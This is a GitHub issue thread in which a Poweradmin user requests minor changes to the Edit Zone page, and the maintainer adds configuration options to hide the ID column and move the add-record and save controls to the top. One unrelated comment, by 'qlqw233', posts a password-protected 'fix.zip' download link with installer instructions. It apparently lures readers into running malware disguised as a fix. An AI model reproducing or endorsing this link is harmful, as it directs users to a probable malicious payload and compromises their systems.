### ISSUE TITLE
[Request] Minor GUI enhancements

### ISSUE THREAD

**Issue by michielvisser** [poweradmin/poweradmin#581]
I've found and installed Poweradmin about two months ago, using the latest files by pulling the master branch. Love the software, works like a charm. 

While working with it, I found a couple of (minor) GUI enhancements that I would like to request/address. All of them are either cosmetical or (personal) workflow related and do not hinder the functionality. All are about the 'Edit Zone' page in which all the DNS records for a zone are displayed.

1. I would love to hide the ID column that is currently shown, maybe via a configuration option in the config file?
2. Currently, all the DNS record fields are shown as editable fields, but when I try to edit e.g. an IP address in an A record, the only thing happen is that the text field gets expanded and the change is not completed. Also, because of the fact that there is an Edit-button for each DNS record, would it make sense to build the table with records as a text-only table instead of having the form-fields as it is right now? The edit or remove buttons can then be used for editing single records
3. Currently, the add new record fields are at the bottom of the table. For me, it would make sense to move this to the top of the table so you can easily and quickly add a new record to a zone whilst still have the current DNS records available (FYI - I've increased the max number of records displayed on a page).

As said, all of these are minor and most likely just nuisances on my end.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by edmondas** [comment]
@michielvisser Thank you for your feedback and suggestions for improvements. Your input provides insights into how the system is being used.

To address your points:

- Hiding the ID is feasible. However, it requires careful consideration of how to implement this change within the current framework, which still contains a significant amount of legacy code.
- The issue with auto-expanding fields appears to be related to a recently introduced feature. I will investigate this matter, as it was primarily intended for textarea-like fields. Your other UI improvement suggestions are noted and will be revisited when time permits.
- Regarding the new record fields, I will examine the possibilities and determine what can be done.

My current plan is to implement these changes over the next three months. However, please note that this timeline may vary depending on various factors. In some cases, extensive restructuring of the code may be necessary, which could impact the implementation schedule.

**Comment by edmondas** [comment]
1st UI improvement added to the master. Set `$iface_edit_show_id = false;` in your configuration to remove the ID field from the zone edit view.

**Comment by apezio** [comment]
Hi,

I agree with your idea 3).  However I am not sure about 2):

> 2. Currently, all the DNS record fields are shown as editable fields, but when I try to edit e.g. an IP address in an A record, the only thing happen is that the text field gets expanded and the change is not completed. Also, because of the fact that there is an Edit-button for each DNS record, would it make sense to build the table with records as a text-only table instead of having the form-fields as it is right now? The edit or remove buttons can then be used for editing single records

 As it stands now, its very easy to make any number of changes to all the displayed records and then press Update (at the bottom of the page). This works for me on the latest release...  If you had to edit each record one at a time, or press edit first, that would seem to take away a lot of functionality.  Please dont make the records un-editable.

**Comment by edmondas** [comment]
The third request and the overall flow need reconsideration. Moving the fields is a reasonable option, or we could make their placement configurable. However, the current flow feels unintuitive. I propose that after adding a new record, the user should be redirected back to the list view. Ideally, the newly added record could appear at the top of the list, though I'm unsure about the technical feasibility of this feature.

Given that the web app currently uses full server-side rendering without an API, page reloads are inevitable. Nevertheless, I believe these changes would enhance the user experience.

What are your thoughts on these suggestions? Do they align with your vision for improving the application's usability?

**Comment by edmondas** [comment]
@michielvisser What do you think? It's far from perfect, but maybe that's what you want. Added to the master. Enabled by `$iface_edit_add_record_top = true;`

![image](https://github.com/user-attachments/assets/52fa4830-5cae-46ad-964a-23605b7d14e6)

**Comment by michielvisser** [comment]
@edmondas  I've pulled the new master and can confirm it is working. Couldn't get it to work first time but that proved to be a PHP cache issue on my end. I think having the add record option on the page this way is a definitive improvement and it works like a charm. As you already suggested in an earlier comment, I would love to see the index back on screen after adding a record which would make more sense to me than the page being displayed right now. Showing the newly added record to the top of the list would also make sense but it is not a mandatory thing for me, as long as some confirmation that the record has been added can be displayed?

With respect to my last point - changing the edit fields into text only, based on the explanation by @apezio earlier, I can understand. I would say that it then doesn't make sense to change the text fields. To be honest, I completely missed the update button at the bottom for mass changes, to me based on layout I thought it was for updating the comment section. However, based on that, I would suggest two improvements to the page for ease of workflow:

1. Moving the 'Update' and 'Reset' buttons to the top of the list as well, below the separator for the Add new record section. Also, I would suggest changing the caption of the Update button to something like 'Save changes' to make it more clear what it is meant for. 
2. If it is possible to have (sub)headers within the page, I would suggest moving the current header which says 'Edit zone <zone name>' to below the separator of the 'add new record' section to make clear that you can edit the zone records below. Add in a new header that states 'Add new record' in the section above.

With those two things said,  I personally think the separate 'Edit' buttons on each record are somewhat redundant, unless it would help to edit one single record in a focussed page, e.g. for complicated records with very specific content and order of that content within that record. But as there is no help on filling out the records that way on clicking Edit at the moment, they look redundant to me. Unless, of course, in a feature request for the future we can add context-based record editing? Just a thought on my side...

And one nitpicking thing that I noticed some time ago but this is really really minor and maybe not worth fixing - the SOA record in the page is always displayed in a different, bigger, font size than all of the rest of the records. This might be due to template.

**Comment by edmondas** [comment]
I've implemented three new configuration options to improve the interface layout:

```php
$iface_edit_add_record_top = true;
$iface_edit_save_changes_top = true;
$iface_edit_show_id = false;
```

These settings will:
- Place both the "Add Record" and "Save Changes" buttons at the top of the interface for better accessibility
- Hide the ID field from the interface.

I think it would be better to handle the readonly state through a dedicated view mode. We can explore implementing this feature in a future update if needed.

Please try these new settings and let me know if they meet your needs!

<img width="1306" alt="Screenshot 2024-12-28 at 20 39 49" src="https://github.com/user-attachments/assets/57ee3554-794e-485b-b5ae-4d71fa8d057d" />

**Comment by edmondas** [comment]
I'm planning to make a release, so I'm closing this ticket. If you have additional changes, please create a new ticket. Minor changes might still be included in this release if time permits. Overall, thank you for your ideas.
